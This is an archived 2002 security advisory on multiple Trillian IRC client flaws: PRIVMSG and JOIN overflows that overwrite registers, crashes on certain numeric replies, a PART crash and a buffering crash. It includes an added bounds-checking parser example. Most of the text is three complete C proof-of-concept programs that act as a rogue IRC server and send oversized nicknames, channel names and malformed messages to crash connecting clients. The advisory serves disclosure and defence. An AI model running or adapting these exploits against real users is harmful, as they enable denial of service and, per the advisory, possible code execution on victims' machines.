[NT] Multiple Trillian Security Vulnerabilities

From: support@securiteam.com
Date: 09/25/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 25 Sep 2002 11:06:25 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Trillian Security Vulnerabilities
------------------------------------------------------------------------

SUMMARY

Trillian is a popular Instant Messaging client which supports
ICQ/AIM/Yahoo/MSN and IRC. The product has been found to contain multiple
security vulnerabilities that allow a remote attacker to crash it; some of
the vulnerabilities overwrite EIP, allowing a remote attacker to cause the
product to execute arbitrary code.

DETAILS

Vulnerable systems:
 * Trillian version 0.74 and prior

PRIVMSG overflow:
An overflow exists in the way Trillian processes 'PRIVMSG' commands from
the IRC server. If the nickname of the sender is longer than 206 bytes,
Trillian will crash and overwrite registers.

JOIN overflow:
An overflow exists in the way Trillian processes 'JOIN' commands from the
IRC server. If Trillian joins a channel whose name is longer than 206
bytes, Trillian will crash and overwrite registers.

Multiple Raw flaws:
There appears to be a flaw in the way Trillian processes some IRC raw
(numeric reply) messages; the following raw messages crash Trillian:

206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367

The server sends the raw commands in the format ':Server <Num>', where
<Num> is one of the raw codes listed above and no further parameters follow.

Part flaw:
If Trillian receives a message about a user parting a channel that Trillian
itself is not in, or if no channel is specified at all, Trillian will crash.

PART messages are sent in the form: ":nick!ident@address PART <Channel>"

Data buffering flaw:
There appears to be a flaw in the way Trillian buffers data from the IRC
server: if Trillian receives a block of data longer than 4095 bytes,
Trillian will crash.
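
As an added example (not code from the advisory or from Trillian), the following C handler shows the bounds checks a client needs for the message kinds listed above: it refuses lines longer than the buffer, nick and channel names that would not fit their fixed buffers, bare numerics with no parameters, and a PART for a channel the client never joined. The 206-byte and 4095-byte limits are taken from the advisory's numbers; the function names, the joined-channel list and the test helper are assumptions constructed for this example.

```c
/* Added example, not code from the advisory or from Trillian: a bounds-checked
 * handler for the message kinds the advisory lists. The 206/4095 limits are the
 * advisory's numbers, used as assumptions; the joined-channel list is constructed. */
#include <string.h>
#define MAX_LINE 4095   /* largest block the client will buffer */
#define MAX_NAME 206    /* longest nick or channel name accepted */
enum { IRC_OK, IRC_TOO_LONG, IRC_BAD_LINE, IRC_MISSING_ARGS, IRC_NOT_IN_CHANNEL };
static int in_channel(const char *c) { return !strcmp(c, "#korp") || !strcmp(c, "#test"); }

/* Copy a token into a fixed buffer only if it fits together with its terminator. */
static int copy_tok(char *dst, size_t cap, const char *src, size_t len) {
    if (len == 0 || len >= cap) return 0;
    memcpy(dst, src, len); dst[len] = '\0'; return 1;
}

/* Handle one ":prefix CMD args" line; copies the sender's nick into nick_out. */
int handle_line(const char *line, char *nick_out, size_t nick_cap) {
    char cmd[16], chan[MAX_NAME + 1];
    const char *p = line + 1, *sp, *bang, *arg, *a, *end;
    size_t len = strlen(line);
    if (len > MAX_LINE) return IRC_TOO_LONG;              /* data buffering flaw */
    if (line[0] != ':' || !(sp = strchr(p, ' '))) return IRC_BAD_LINE;
    bang = memchr(p, '!', sp - p);                        /* nick ends at '!' or ' ' */
    if (!copy_tok(nick_out, nick_cap, p, (bang ? bang : sp) - p))
        return IRC_TOO_LONG;                              /* PRIVMSG long-nick overflow */
    arg = strchr(sp + 1, ' ');
    if (!copy_tok(cmd, sizeof cmd, sp + 1, (arg ? arg : line + len) - (sp + 1)))
        return IRC_BAD_LINE;
    if (cmd[0] >= '0' && cmd[0] <= '9' && !arg)
        return IRC_MISSING_ARGS;                          /* bare numeric ":server 206" */
    if (strcmp(cmd, "JOIN") == 0 || strcmp(cmd, "PART") == 0) {
        if (!arg) return IRC_MISSING_ARGS;                /* PART with no channel */
        a = arg + 1 + (arg[1] == ':');                    /* JOIN carries ":#chan" */
        end = strchr(a, ' ');
        if (!copy_tok(chan, sizeof chan, a, (end ? end : line + len) - a))
            return IRC_TOO_LONG;                          /* JOIN long-channel overflow */
        if (cmd[0] == 'P' && !in_channel(chan)) return IRC_NOT_IN_CHANNEL;
    }
    return IRC_OK;
}

/* Builds prefix + n copies of c + suffix and runs it through handle_line. */
int handle_padded(const char *prefix, char c, size_t n, const char *suffix) {
    static char buf[8192];
    char nick[MAX_NAME + 1];
    size_t pl = strlen(prefix), sl = strlen(suffix);
    if (pl + n + sl >= sizeof buf) return IRC_TOO_LONG;
    memcpy(buf, prefix, pl); memset(buf + pl, c, n); memcpy(buf + pl + n, suffix, sl + 1);
    return handle_line(buf, nick, sizeof nick);
}
```

Each of the advisory's inputs (a 300-byte nick, a 300-byte channel, a bare ":server 206", a PART without or for an unjoined channel, a 4096-byte block) is rejected with a distinct result code instead of being copied into a fixed buffer.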

Exploit code to reproduce flaws:
/* Trillian-Dos.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits Multiple Trillian DoS Flaws:
      Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
      333, 352, 367
      Part Flaw
      Data length flaw.

   Tested On Version .74
   Compiles with Borland 5.5 Commandline Tools.

   These Examples Will Just DoS The Trillian Client,
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

#define SERVER ":server "
#define PART ":nick!ident@address PART\n"

void usage(void);

int main(int argc, char *argv[]) {
    SOCKET TempSock = INVALID_SOCKET;
    WSADATA WsaDat;
    SOCKADDR_IN Sockaddr;
    int nRet;
    char payload[4096];

    if (argc < 2) {
        usage();
        return 1;
    }
    /* "raw" needs a numeric argument; anything other than raw/part/data is an error */
    if ((!strcmp(argv[1], "raw") && argc < 3) ||
        (strcmp(argv[1], "raw") && strcmp(argv[1], "part") && strcmp(argv[1], "data"))) {
        usage();
        return 1;
    }

    printf("Listening on port 6667 for connections....\n");
    if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        printf("ERROR: WSA Initialization failed.");
        return 0;
    }

    /* Create Socket */
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("ERROR: Could Not Create Socket. Exiting\n");
        WSACleanup();
        return 0;
    }

    /* Act as the IRC server on port 6667, all interfaces */
    Sockaddr.sin_port = htons(6667);
    Sockaddr.sin_family = AF_INET;
    Sockaddr.sin_addr.s_addr = INADDR_ANY;

    nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
    if (nRet == SOCKET_ERROR) {
        printf("ERROR Binding Socket");
        WSACleanup();
        return 0;
    }

    /* Make Socket Listen */
    if (listen(s, 10) == SOCKET_ERROR) {
        printf("ERROR: Couldnt Make Listening Socket\n");
        WSACleanup();
        return 0;
    }

    /* Wait for the client to connect */
    while (TempSock == INVALID_SOCKET) {
        TempSock = accept(s, NULL, NULL);
    }

    printf("Client Connected, Sending Payload\n");

    if (!strcmp(argv[1], "part")) {
        /* PART with no channel given */
        send(TempSock, PART, strlen(PART), 0);
    }
    if (!strcmp(argv[1], "raw")) {
        /* ":server <Num>" with no parameters */
        send(TempSock, SERVER, strlen(SERVER), 0);
        send(TempSock, argv[2], strlen(argv[2]), 0);
        send(TempSock, "\n", 1, 0);
    }
    if (!strcmp(argv[1], "data")) {
        /* 4096 bytes with no line terminator; use sizeof, not strlen, because
           the buffer is not NUL-terminated */
        memset(payload, 'A', sizeof(payload));
        send(TempSock, payload, sizeof(payload), 0);
    }
    printf("Exiting\n");
    Sleep(100 * 1000);   /* keep the connection open for 100 seconds before exiting */
    closesocket(TempSock);
    closesocket(s);
    WSACleanup();
    return 0;
}

void usage(void) {
    printf("\nTrillian Multiple DoS Flaws\n");
    printf("---------------------------\n");
    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
    printf("Tested On Version .74\n\n");
    printf("Usage: Trillian-Dos <type> [num]\n");
    printf("Type: raw, part, data\n");
    printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, "
           "333, 352, 367\n\n");
}

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

/* Welcome numeric so the client considers itself registered, followed by a
   JOIN whose channel name is the 300-byte payload sent afterwards */
#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main(void) {
    SOCKET TempSock = INVALID_SOCKET;
    WSADATA WsaDat;
    SOCKADDR_IN Sockaddr;
    int nRet;
    char payload[300];

    printf("\nTrillian Join Flaw\n");
    printf("----------------------\n");
    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
    printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

    if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        printf("ERROR: WSA Initialization failed.");
        return 0;
    }

    /* Create Socket */
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("ERROR: Could Not Create Socket. Exiting\n");
        WSACleanup();
        return 0;
    }

    /* Act as the IRC server on port 6667, all interfaces */
    Sockaddr.sin_port = htons(6667);
    Sockaddr.sin_family = AF_INET;
    Sockaddr.sin_addr.s_addr = INADDR_ANY;

    nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
    if (nRet == SOCKET_ERROR) {
        printf("ERROR Binding Socket");
        WSACleanup();
        return 0;
    }

    /* Make Socket Listen */
    if (listen(s, 10) == SOCKET_ERROR) {
        printf("ERROR: Couldnt Make Listening Socket\n");
        WSACleanup();
        return 0;
    }

    /* Wait for the client to connect */
    while (TempSock == INVALID_SOCKET) {
        TempSock = accept(s, NULL, NULL);
    }

    printf("Client Connected, Sending Payload\n");

    send(TempSock, MSG1, strlen(MSG1), 0);
    /* 300-byte channel name, over the 206-byte limit; use sizeof, not strlen,
       because the buffer is not NUL-terminated */
    memset(payload, 'A', sizeof(payload));
    send(TempSock, payload, sizeof(payload), 0);
    send(TempSock, "\n", 1, 0);

    printf("Exiting\n");
    Sleep(100 * 1000);   /* keep the connection open for 100 seconds before exiting */
    closesocket(TempSock);
    closesocket(s);
    WSACleanup();
    return 0;
}

/* Trillian-Privmsg.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Privmsg Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

/* Welcome numeric, then the start of a message prefix whose nickname is the
   300-byte payload sent between MSG1 and MSG2 */
#define MSG1 ":server 001 target :target\n:"
#define MSG2 "!ident@address PRIVMSG target :You are the weakest link, Goodbye.\n"

int main(void) {
    SOCKET TempSock = INVALID_SOCKET;
    WSADATA WsaDat;
    SOCKADDR_IN Sockaddr;
    int nRet;
    char payload[300];

    printf("\nTrillian Privmsg Flaw\n");
    printf("----------------------\n");
    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
    printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

    if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        printf("ERROR: WSA Initialization failed.");
        return 0;
    }

    /* Create Socket */
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("ERROR: Could Not Create Socket. Exiting\n");
        WSACleanup();
        return 0;
    }

    /* Act as the IRC server on port 6667, all interfaces */
    Sockaddr.sin_port = htons(6667);
    Sockaddr.sin_family = AF_INET;
    Sockaddr.sin_addr.s_addr = INADDR_ANY;

    nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
    if (nRet == SOCKET_ERROR) {
        printf("ERROR Binding Socket");
        WSACleanup();
        return 0;
    }

    /* Make Socket Listen */
    if (listen(s, 10) == SOCKET_ERROR) {
        printf("ERROR: Couldnt Make Listening Socket\n");
        WSACleanup();
        return 0;
    }

    /* Wait for the client to connect */
    while (TempSock == INVALID_SOCKET) {
        TempSock = accept(s, NULL, NULL);
    }

    printf("Client Connected, Sending Payload\n");

    send(TempSock, MSG1, strlen(MSG1), 0);
    /* 300-byte sender nickname, over the 206-byte limit; use sizeof, not
       strlen, because the buffer is not NUL-terminated */
    memset(payload, 'A', sizeof(payload));
    send(TempSock, payload, sizeof(payload), 0);
    send(TempSock, MSG2, strlen(MSG2), 0);

    printf("Exiting\n");
    Sleep(100 * 1000);   /* keep the connection open for 100 seconds before exiting */
    closesocket(TempSock);
    closesocket(s);
    WSACleanup();
    return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:fitzies@hotmail.com> Lance
Fitz-Herbert.
